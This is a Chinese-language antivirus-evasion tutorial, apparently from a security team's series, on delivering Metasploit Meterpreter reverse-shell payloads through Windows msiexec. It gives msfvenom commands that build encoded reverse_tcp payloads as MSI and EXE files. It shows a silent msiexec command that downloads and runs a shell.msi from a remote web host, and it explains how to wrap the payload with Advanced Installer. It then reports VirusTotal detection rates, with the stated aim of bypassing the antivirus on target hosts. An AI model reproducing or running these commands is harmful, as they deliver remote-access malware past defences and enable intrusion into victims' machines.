文章打包下载及相关软件下载：https://github.com/TideSec/BypassAntiVirus

免杀能力一览表

几点说明：

1、上表中标识 √ 说明相应杀毒软件未检测出病毒，也就是代表了Bypass。

2、为了更好的对比效果，大部分测试payload均使用msf的windows/meterperter/reverse_tcp模块生成。

3、由于本机测试时只是安装了360全家桶和火绒，所以默认情况下360和火绒杀毒情况指的是静态+动态查杀。360杀毒版本5.0.0.8160(2020.01.01)，火绒版本5.0.34.16(2020.01.01)，360安全卫士12.0.0.2002(2020.01.01)。

4、其他杀软的检测指标是在virustotal.com（简称VT）上在线查杀，所以可能只是代表了静态查杀能力，数据仅供参考，不足以作为免杀或杀软查杀能力的判断指标。

5、完全不必要苛求一种免杀技术能bypass所有杀软，这样的技术肯定是有的，只是没被公开，一旦公开第二天就能被杀了，其实我们只要能bypass目标主机上的杀软就足够了。

一、msiexec.exe介绍

看到msiexec可能还有点陌生，但说道.msi可能就比较熟悉了，在windows下很多软件安装就是.msi格式的。当Windows操作系统安装了Windows Installer引擎，而MSI软件包使用该引擎来安装应用程序，解释包和安装产品的可执行程序就是我们这用到 的Msiexec.exe。

之前在介绍免杀工具的时候有些工具就可以生成msi格式的payload，比如专题6介绍的venom：https://mp.weixin.qq.com/s/CbfxupSWEPB86tBZsmxNCQ,其实msfvenom也可以生成msi格式的payload，不过被杀软查杀的比较厉害了。

msi文件可以双击执行，也可以命令行静默执行，而且msiexec也同样支持远程下载功能，将msi文件上传到服务器，通过如下命令远程执行：

msiexec /q /i http://www.tidesec.com/shell/shell.msi

二、msf自生成msi(VT查杀率27/60)

我先用msfvenom生成一个原生态的msi文件看一下

msfvenom -p windows/meterpreter/reverse_tcp lhost=10.211.55.2 lport=3333 -e x86/shikata_ga_nai -i 15 -b 'x00' -f msi -o test.msi

在测试机器上执行，可以双击进行安装，也可以使用命令行静默执行。

msiexec /q /i test.msi

不出意料，静态和动态查杀都没过。

virustotal.com上查杀率27/60个，还算不错呢。

四、使用Advanced Installer(VT免杀率29/59)

Advanced Installer是一款功能强大、可生成符合MS Windows认证的Windows Installer的MSI 安装包制作工具，具有友好的图形用户界面，直观而且非常简单的界面，是一款很好的 Windows Installer 编写工具。

绿色版下载http://www.pc6.com/softview/SoftView_13165.html

先用msf生成一个exe格式的apyload

msfvenom -p windows/meterpreter/reverse_tcp lhost=10.211.55.2 lport=3333 -e x86/shikata_ga_nai -i 15 -b 'x00' -f exe -o shell.exe

打开Advanced Installer，创建一个项目

在项目中选择自定义操作，然后附加shell文件

选择构建，开始生成msi文件。

静默执行msiexec /q /i "Your Application.msi"

无法过360和火绒。

virustotal.com上Your Application.msi查杀率为29/58，略惨，还不如msf直接生成的。

virustotal.com上shell.exe查杀率为54/70，也就是说利用Advanced Installer打包后有15个杀软不会报病毒了，这点来看还算可以的。

虽然查杀率有些高，但这种思路还是不错的，这种工具网上有很多，可以找一些小众的试一下。

五、参考资料

使用msiexec.exe绕过应用程序白名单（多种方法）:https://www.cnblogs.com/backlion/p/10493910.html

渗透测试中的msiexec：https://3gstudent.github.io/3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95%E4%B8%AD%E7%9A%84msiexec/

E

N

D

guān

关

zhù

注

wǒ

我

men

们

Tide安全团队正式成立于2019年1月，是新潮信息旗下以互联网攻防技术研究为目标的安全团队，目前聚集了十多位专业的安全攻防技术研究人员，专注于网络攻防、Web安全、移动终端、安全开发、IoT/物联网/工控安全等方向。

想了解更多Tide安全团队，请关注团队官网: http://www.TideSec.com 或长按二维码关注公众号：